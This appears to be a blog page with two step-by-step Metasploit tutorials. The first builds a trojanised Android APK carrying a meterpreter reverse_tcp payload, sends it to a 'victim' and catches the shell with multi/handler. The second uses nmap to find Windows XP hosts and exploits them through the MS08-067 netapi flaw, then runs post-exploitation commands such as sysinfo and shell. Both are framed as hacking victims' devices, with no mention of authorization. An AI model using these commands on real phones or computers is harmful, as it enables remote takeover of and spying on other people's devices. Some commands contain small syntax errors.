Hack Android Mobile With Metasploit step by step

Hack Android Mobile With Metasploit step by step

Hello Guys, Today in this post we will discuss how to hack android mobile there are may ways of the android hacking but today I will show you how you can hack android mobile using Metasploit because metasploit is a free ware framework so we can hack mobile by this method. First let me start with introduction.

Android

Android is a mobile operating system based on the linux kernel developed by google. primarily android is designed for touch screen mobiles such as smartphone, tablet e.t.c with user interface based on the direct mainupulation.

So let’s come to point.

Pre requisite:

  1. Android Phone
  2. Attacker system Kali linux
  3. Metasploit
  4. Brain 🙂

so this are the requirements to perform this practical in this post In metasploit series i am covering from basics and will cover up to post exploitation.

  • As an attacker we need to check our ip address using “ifconfig” command to set LHOST & LPORT.
  • Now you Need to create a msfpayload use the following command.

msfpayload android/meterpreter/reverse_tcp LHOST=[Attacker IP address] LPORT [Port which you want to forward] R > /var/www/anyname.apk

hack android mobile using metasploit

Here as  I setted an LPORT is 443 because there is a one good reason behind this the reason is that almost every mobile has 443 open.

by using above command the apk will created..

  • Now launch msfconsole
  • here we use exploit multihandler to start our attack as well as payload.
  • use the following commands given below.

use exploit/multi/handler [Enter]
set payload/android/meterpreter/reverse_tcp [Enter]
Set LHOST= attacker Ip
set LPORT=443

Now we need to give permission to our apk that we created attack.apk  for giving permission use this command

chmod 777 /var/www/attack.apk

Yeah, we gave permission to our apk Now, I will send file to victim. Before installing this file to victim just start your metasploit listener using exploit command. when victim installed your apk then metaploit behaviour changes like this and shows you session opened..

hack android mobile using metasploit

Now our listner is listening traffic and giving information.

In previous tutorial we discussed post exploitation with meterpreter in netapi windows xp vulnerability read carefully steps are same.

Keep learning and practising…

Exploit windows xp by metasploit Netapi vulnerability

Exploit windows xp by metasploit Netapi vulnerability

Hello guys, hope you were doing better and practising today in this tutorial i will show how you can exploit windows xp using metasploit.

In this tutorial we will exploit windows xp by MS08-67 Netapi vulnerability so,               which type of vulnerability is this ..?   the answer is this is a vulnerability in windows samba service called called MS08-67 this exploits work on the port number 445 and upto windows xp sp3 version.

Name- Microsoft server service relative path stack corruption. 
Exploit- exploit/windows/smb/ms_08_67_netapi
  • As I told you above this vulnerablility will work on the port number 445 so firstly scan for open ports.
  • open Nmap and scan for open ports by this command nmap -n -sV 192.168.1.*

metasploit

  • yeah port 445 is open.
  • start msfconsole and use the above exploit as shown below
  • now set RHOST. RHOST is remote address of victim

metasploit

  • now set payload as shown below here payload is set here to get a reverse connection in meterpreter here we are using windows meterpreter if you want to see all avilable apyload for that exploit then use “show payloads” command. Here we are using this payload
windows/meterpreter/reverse_tcp
  • Now use show options command and set LHOST Lhost is your IP address
  • Run exploit yeah we get back connection with victim pc.

Post Exploitation with meterpreter

  • type sysinfo to get the system information of victim.

metasploit

Here you see that in the above image victims information is available. There are many types of options in meterprer you can check with ‘ ? ‘ command. Suppose if you want to shell that pc so run ‘shell’ command in the metrpreter shell will be created.

In our metasploit soonly i will update many of the tutorials on metasploit series because metasploit has many of the exploits, auxiliary, payloads, script, e.t.c which will help you for exploitation.

keep learning and practising because practise makes a man perfect… 🙂